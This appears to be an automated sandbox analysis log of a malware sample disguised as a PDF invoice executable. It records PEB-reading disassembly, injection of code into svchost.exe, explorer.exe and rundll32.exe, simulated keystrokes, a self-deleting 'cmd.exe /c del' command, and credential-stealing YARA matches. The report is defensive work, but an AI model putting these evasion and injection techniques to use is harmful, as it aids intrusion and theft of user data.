          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6500 mov eax, dword ptr fs:[00000030h]1_2_033C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338550 mov eax, dword ptr fs:[00000030h]1_2_03338550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338550 mov eax, dword ptr fs:[00000030h]1_2_03338550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033545B1 mov eax, dword ptr fs:[00000030h]1_2_033545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033545B1 mov eax, dword ptr fs:[00000030h]1_2_033545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E59C mov eax, dword ptr fs:[00000030h]1_2_0336E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332582 mov eax, dword ptr fs:[00000030h]1_2_03332582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332582 mov ecx, dword ptr fs:[00000030h]1_2_03332582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364588 mov eax, dword ptr fs:[00000030h]1_2_03364588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033325E0 mov eax, dword ptr fs:[00000030h]1_2_033325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C5ED mov eax, dword ptr fs:[00000030h]1_2_0336C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C5ED mov eax, dword ptr fs:[00000030h]1_2_0336C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033365D0 mov eax, dword ptr fs:[00000030h]1_2_033365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A5D0 mov eax, dword ptr fs:[00000030h]1_2_0336A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A5D0 mov eax, dword ptr fs:[00000030h]1_2_0336A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E5CF mov eax, dword ptr fs:[00000030h]1_2_0336E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E5CF mov eax, dword ptr fs:[00000030h]1_2_0336E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C427 mov eax, dword ptr fs:[00000030h]1_2_0332C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC460 mov ecx, dword ptr fs:[00000030h]1_2_033BC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA456 mov eax, dword ptr fs:[00000030h]1_2_033EA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332645D mov eax, dword ptr fs:[00000030h]1_2_0332645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335245A mov eax, dword ptr fs:[00000030h]1_2_0335245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033644B0 mov ecx, dword ptr fs:[00000030h]1_2_033644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BA4B0 mov eax, dword ptr fs:[00000030h]1_2_033BA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033364AB mov eax, dword ptr fs:[00000030h]1_2_033364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA49A mov eax, dword ptr fs:[00000030h]1_2_033EA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033304E5 mov ecx, dword ptr fs:[00000030h]1_2_033304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EB20 mov eax, dword ptr fs:[00000030h]1_2_0335EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EB20 mov eax, dword ptr fs:[00000030h]1_2_0335EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F8B28 mov eax, dword ptr fs:[00000030h]1_2_033F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F8B28 mov eax, dword ptr fs:[00000030h]1_2_033F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332CB7E mov eax, dword ptr fs:[00000030h]1_2_0332CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEB50 mov eax, dword ptr fs:[00000030h]1_2_033DEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4B4B mov eax, dword ptr fs:[00000030h]1_2_033E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4B4B mov eax, dword ptr fs:[00000030h]1_2_033E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6B40 mov eax, dword ptr fs:[00000030h]1_2_033C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6B40 mov eax, dword ptr fs:[00000030h]1_2_033C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FAB40 mov eax, dword ptr fs:[00000030h]1_2_033FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D8B42 mov eax, dword ptr fs:[00000030h]1_2_033D8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340BBE mov eax, dword ptr fs:[00000030h]1_2_03340BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340BBE mov eax, dword ptr fs:[00000030h]1_2_03340BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4BB0 mov eax, dword ptr fs:[00000030h]1_2_033E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4BB0 mov eax, dword ptr fs:[00000030h]1_2_033E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EBFC mov eax, dword ptr fs:[00000030h]1_2_0335EBFC
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033BCBF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DEBD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03354A35 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0336CA24 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0335EA2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033BCA11 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033ACA72 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DEA60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03340A5B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03338AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03386AA4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03368A90 mov edx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03404A80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0336AAEE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03330AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03364AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B892A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C892B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033BC912 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03328918 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033AE908 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033D4978 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033BC97C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0337096E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0337096E mov edx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B0946 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B89B3 mov esi, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B89B3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033309AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033629F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033BE9E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033649D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FA9D3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C69C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03352835 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0336A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033D483A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033BC810 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033BE872 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C6870 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03360854 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03334859 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03342840 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034008C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033BC89D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03330887 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0336C8F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FA8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0335E8C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0335EF28 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
          Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_0077A364 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_0077A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00C261C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00C26510 SetUnhandledExceptionFilter

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\svchost.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\svchost.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: C20000
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 6FD008
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007A8C93 LogonUserW
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_00753B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_00754A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007B4EF5 mouse_event
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe"
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007B4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
          Source: Genesis RMS Private Limited November 2024 pdf.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: Genesis RMS Private Limited November 2024 pdf.exe, explorer.exe, 00000002.00000002.4131873687.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1686913297.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.1686913297.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4129869928.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.1686041422.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4129302361.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
          Source: explorer.exe, 00000002.00000000.1686913297.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4129869928.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.1686913297.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4129869928.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_0077886B cpuid
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007850D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_00792230 GetUserNameW
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_0078418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_00754AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

          Stealing of Sensitive Information

          Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
